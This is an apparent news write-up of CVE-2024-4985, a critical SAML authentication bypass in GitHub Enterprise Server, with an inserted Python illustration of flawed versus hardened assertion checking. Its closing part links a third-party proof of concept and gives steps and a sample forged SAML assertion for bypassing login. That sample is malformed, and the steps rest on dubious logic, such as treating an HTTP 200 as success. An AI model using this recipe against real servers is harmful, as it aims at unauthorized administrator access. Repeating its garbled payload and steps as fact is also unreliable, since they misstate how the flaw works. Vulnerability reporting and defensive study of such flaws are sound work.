CVE-2024-4985 (CVSS 10): Critical Authentication Bypass Flaw Found in GitHub Enterprise Server

GitHub, the world’s leading software development platform, has disclosed a critical security vulnerability (CVE-2024-4985) in its self-hosted GitHub Enterprise Server (GHES) product. The vulnerability, which carries a maximum severity rating of 10 on the Common Vulnerability Scoring System (CVSS), could allow attackers to bypass authentication and gain unauthorized access to sensitive code repositories and data.

GitHub Enterprise Server is the self-hosted version of GitHub Enterprise, tailored for businesses seeking a secure and customizable environment for source code management. Installed on an organization’s own servers or private cloud, it enables collaborative development while providing robust security and administrative controls.

The flaw resides in the optional encrypted assertions feature of GHES's SAML single sign-on (SSO) authentication mechanism. This feature, designed to enhance security, ironically became the weak link: an attacker could forge a SAML response, impersonate a legitimate user and potentially gain administrator privileges.

This vulnerability was discovered through GitHub’s Bug Bounty program, which rewards security researchers for identifying and reporting vulnerabilities.

It is important to note that the vulnerability only affects instances where SAML SSO is enabled with encrypted assertions, which are not activated by default. Therefore, organizations not using SAML SSO or those using SAML SSO without encrypted assertions are not impacted by this security flaw.

The primary danger posed by CVE-2024-4985 is the ability of an attacker to gain unauthorized access to GHES instances. By forging a SAML response, attackers can effectively bypass authentication mechanisms and provision accounts with site administrator privileges. For organizations utilizing the vulnerable configuration, the consequences of exploitation could be dire, including unauthorized access to source code, data breaches, and potential disruption of development operations.

GitHub has acted swiftly to address the issue, releasing patches in GHES versions 3.9.15, 3.10.12, 3.11.10, and 3.12.4. Administrators are strongly urged to update their installations immediately to mitigate the risk of compromise.

Technical vulnerability details:

The vulnerability lies in the way GHES handles encrypted SAML assertions. An attacker could craft a forged SAML assertion containing valid-looking user information. When GHES processes the forged assertion, it fails to validate its signature correctly, allowing the attacker to gain access to the GHES instance.
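The failure mode described above, as an added illustration that is not GitHub's code and does not reproduce the actual GHES logic: a toy SAML service provider that receives an "encrypted assertion", with the flawed acceptance path beside the hardened one. XML-Enc and XML-DSig are stood in for by base64 wrapping and an HMAC over the assertion, and the key, audience and sample assertion are all constructed for the demo.

```python
import base64, hashlib, hmac
import xml.etree.ElementTree as ET

# Constructed values for this demo only; nothing here comes from GHES.
IDP_SIGNING_KEY = b"constructed-idp-signing-key"  # stands in for the IdP's private signing key
SP_AUDIENCE = "https://your-ghes-instance.com"

def _canonical(assertion_xml):
    # Simplified canonical form: the <Assertion> with any <Signature> child removed.
    root = ET.fromstring(assertion_xml)
    for sig in root.findall("Signature"):
        root.remove(sig)
    return ET.tostring(root)

def _mac(assertion_xml):
    digest = hmac.new(IDP_SIGNING_KEY, _canonical(assertion_xml), hashlib.sha256).digest()
    return base64.b64encode(digest).decode()

def idp_sign(assertion_xml):
    # IdP side: append a <Signature> element (HMAC stands in for XML-DSig).
    root = ET.fromstring(assertion_xml)
    ET.SubElement(root, "Signature").text = _mac(assertion_xml)
    return ET.tostring(root, encoding="unicode")

def encrypt_for_sp(assertion_xml):
    # Base64 stands in for XML-Enc under the SP's public key. That key is public,
    # so producing a well-formed "encrypted assertion" needs no secret at all:
    # encryption gives confidentiality, never proof that the IdP issued the assertion.
    return "<EncryptedAssertion>%s</EncryptedAssertion>" % base64.b64encode(assertion_xml.encode()).decode()

def _decrypt(encrypted_xml):
    return base64.b64decode(ET.fromstring(encrypted_xml).text).decode()

def sp_accept_vulnerable(encrypted_xml):
    # Flawed pattern: "it decrypted cleanly" is treated as proof of origin and the
    # NameID is provisioned without the IdP signature ever being verified.
    return ET.fromstring(_decrypt(encrypted_xml)).findtext(".//NameID")

def sp_accept_hardened(encrypted_xml):
    # Correct order: decrypt, require and verify the signature, check the audience,
    # and only then trust the NameID. Returns None on any failure.
    assertion_xml = _decrypt(encrypted_xml)
    root = ET.fromstring(assertion_xml)
    sig = root.findtext("Signature") or ""
    if not hmac.compare_digest(sig.encode(), _mac(assertion_xml).encode()):
        return None
    if root.findtext("Audience") != SP_AUDIENCE:
        return None
    return root.findtext(".//NameID")

# Constructed sample: an unsigned assertion that merely claims to be user "jdoe".
UNSIGNED = ('<Assertion ID="1"><Audience>https://your-ghes-instance.com</Audience>'
            '<Subject><NameID>jdoe</NameID></Subject></Assertion>')
```

The vulnerable path provisions "jdoe" from the unsigned assertion, while the hardened path rejects it and accepts only an assertion that carries a valid IdP signature and the expected audience.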

PoC: https://github.com/absholi7ly/Bypass-authentication-GitHub-Enterprise-Server

Steps:

  • Open your penetration-testing tool.
  • Create a web connection request.
  • Select the "GET" request type.
  • Enter your GHES URL.
  • Add a fake SAML Assertion parameter to your request. You can find an example of a fake SAML Assertion parameter in the GitHub documentation.
  • Check the GHES response.
  • If the response contains an HTTP status code of 200, the request has successfully bypassed authentication using the fake SAML Assertion parameter.
  • If the response contains a different HTTP status code, the bypass did not succeed.

Note: the example below uses a dummy URL (https://your-ghes-instance.com); be sure to replace it with your real GHES URL. The fake SAML Assertion parameter used in the example looks like this:

<Assertion ID="1234567890" IssueInstant="2024-05-21T06:40:00Z" Subject="CN=John Doe,OU=Users,O=Acme Corporation,C=US">
  <Audience>https://your-ghes-instance.com</Audience>
  <SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:assertion:method:bearer">
    <SubjectConfirmationData>
      <NameID Type="urn:oasis:names:tc:SAML:2.0:nameid-type:persistent" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:basic">jdoe</NameID>
    </SubjectConfirmationData>
  </SubjectConfirmation>
  <AuthnStatement AuthnInstant="2024-05-21T06:40:00Z" AuthnContextClassRef="urn:oasis:names:tc:SAML:2.0:assertion:AuthnContextClassRef:unspecified">
    <AuthnMethod>urn:oasis:names:tc:SAML:2.0:methodName:password</AuthnMethod>
  </AuthnStatement>
  <AttributeStatement>
    <Attribute Name="urn:oid:1.3.6.1.4.1.11.2.17.19.3.4.0.10">Acme Corporation</Attribute>
    <Attribute Name="urn:oid:1.3.6.1.4.1.11.2.17.19.3.4.0.4">jdoe@acme.com</Attribute>
  </AttributeStatement>
</Assertion>